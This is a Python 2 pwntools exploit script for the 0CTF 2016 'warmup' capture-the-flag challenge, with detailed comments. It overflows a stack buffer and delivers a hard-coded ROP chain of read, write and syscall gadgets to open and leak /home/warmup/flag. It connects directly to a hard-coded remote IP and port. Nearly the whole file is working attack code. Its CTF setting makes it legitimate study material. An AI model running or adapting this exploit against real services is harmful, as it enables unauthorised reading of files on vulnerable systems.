#!/usr/bin/python2
from cStringIO import StringIO
from pwn import *
def attack(connection):
    """Drive the 0CTF 2016 "warmup" service over *connection* and print its reply.

    Builds a fixed 32-bit ROP chain (every address is the author's, hard-coded
    for that contest binary, see the inline comments), delivers it to the
    service in 0x34-byte messages, then sends the NUL-terminated path the chain
    reads from stdin and finally prints the escaped bytes the service returns.

    Args:
        connection: a pwntools tube (``remote`` or ``process``); only
            ``recvuntil``, ``send`` and ``recvall`` are called on it.

    Side effects: network I/O on *connection* and a ``print`` to stdout.
    Nothing here is generic -- the banner, addresses and path are all tied to
    the 2016 challenge binary and service.

    The 0x20 bytes of ``"A"`` filler followed by a 0x34-byte message suggest
    the service reads into a fixed-size stack buffer whose saved return
    address sits at offset 0x20; that is inferred from the payload layout,
    not visible in this file.
    """
    # NUL-terminated so the bytes placed in memory form a valid C string.
    pathname = "/home/warmup/flag\x00"
    # NOTE: `buffer` shadows the Python 2 builtin of the same name.
    buffer = StringIO()
    # Chain layout: each stage is [gadget][pivot][3 args][0x24 filler]; the
    # three 4-byte args plus 0x24 bytes of filler are exactly the 0x30 bytes
    # the "add esp, 0x30 ; ret" pivot skips before landing on the next gadget.
    # Stage 1: read len(pathname) bytes from stdin (fd 0) to 0x08049000.
    buffer.write(p32(0x0804811d)) # sys_read
    buffer.write(p32(0x080481b8)) # add esp, 0x30 ; ret
    buffer.write(p32(0)) # fd
    buffer.write(p32(0x08049000)) # buffer
    buffer.write(p32(len(pathname))) # size
    buffer.write("A" * 0x24)
    # Stage 2: write SYS_open bytes of that memory to stdout.
    # NOTE(review): the size argument is the open(2) syscall number; the
    # author presumably relies on write's return value (bytes written) being
    # left in eax for the bare `syscall` gadget below -- confirm against the
    # binary.
    buffer.write(p32(0x08048135)) # sys_write
    buffer.write(p32(0x080481b8)) # add esp, 0x30 ; ret
    buffer.write(p32(1)) # fd
    buffer.write(p32(0x08049000)) # buffer
    buffer.write(p32(constants.linux.i386.SYS_open)) # size
    buffer.write("A" * 0x24)
    # Stage 3: raw syscall with (pathname, O_RDONLY, 0) as arguments.
    buffer.write(p32(0x08048122)) # syscall
    buffer.write(p32(0x080481b8)) # add esp, 0x30 ; ret
    buffer.write(p32(0x08049000)) # pathname
    buffer.write(p32(constants.linux.O_RDONLY)) # flags
    buffer.write(p32(0))
    buffer.write("A" * 0x24)
    # Stage 4: read up to 0x100 bytes from fd 3 (assumed to be the descriptor
    # returned by the previous stage -- first free fd after 0/1/2) into the
    # same memory.
    buffer.write(p32(0x0804811d)) # sys_read
    buffer.write(p32(0x080481b8)) # add esp, 0x30 ; ret
    buffer.write(p32(3)) # fd
    buffer.write(p32(0x08049000)) # buffer
    buffer.write(p32(0x100)) # size
    buffer.write("A" * 0x24)
    # Stage 5: write those 0x100 bytes to stdout; sys_exit takes the pivot's
    # slot, so the process terminates instead of pivoting again (no filler).
    buffer.write(p32(0x08048135)) # sys_write
    buffer.write(p32(0x0804814d)) # sys_exit
    buffer.write(p32(1)) # fd
    buffer.write(p32(0x08049000)) # buffer
    buffer.write(p32(0x100)) # size
    exploit = buffer.getvalue()
    # Deliver the chain in 16-byte slices, last slice first, one service
    # round each. Every round waits for the banner, then sends exactly 0x34
    # bytes: 0x20 filler, then either the chain's first 0x14 bytes (final
    # round, offset 4) or the `start` address plus one 16-byte slice. In both
    # cases bytes 0x24..0x34 of the message hold chain[offset:offset+0x10].
    # Presumably returning to `start` keeps the service alive for the next
    # round while earlier slices stay on the stack -- inferred, not shown here.
    for offset in reversed(range(4, len(exploit), 0x10)):
        connection.recvuntil("Welcome to 0CTF 2016!\n")
        buffer = StringIO()
        buffer.write("A" * 0x20)
        if offset == 4:
            buffer.write(exploit[: offset + 0x10])
        else:
            buffer.write(p32(0x080480d8)) # start
            buffer.write(exploit[offset: offset + 0x10])
        # Pad to the fixed 0x34-byte message length (zero for every round
        # with the slice sizes above).
        padding = 0x34 - buffer.tell()
        buffer.write("B" * padding)
        connection.send(buffer.getvalue())
    # Stage 1 of the chain reads this path from stdin.
    connection.send(pathname)
    # Read until the service closes the connection (stage 5 calls sys_exit).
    leak = connection.recvall()
    # Python 2 codec: prints non-printable bytes as escape sequences.
    print leak.encode("string_escape")
# pwntools runtime setting: log every byte exchanged on the tube.
context.log_level = "debug"
# Open a tube to the contest service and run the exploit against it; the
# commented-out line is the author's local alternative under strace.
# with process(["strace", "-i", "-o", "log", "./warmup"]) as connection:
connection = remote("202.120.7.207", 52608)
try:
    attack(connection)
finally:
    # Mirrors what the tube's context-manager exit does: always close.
    connection.close()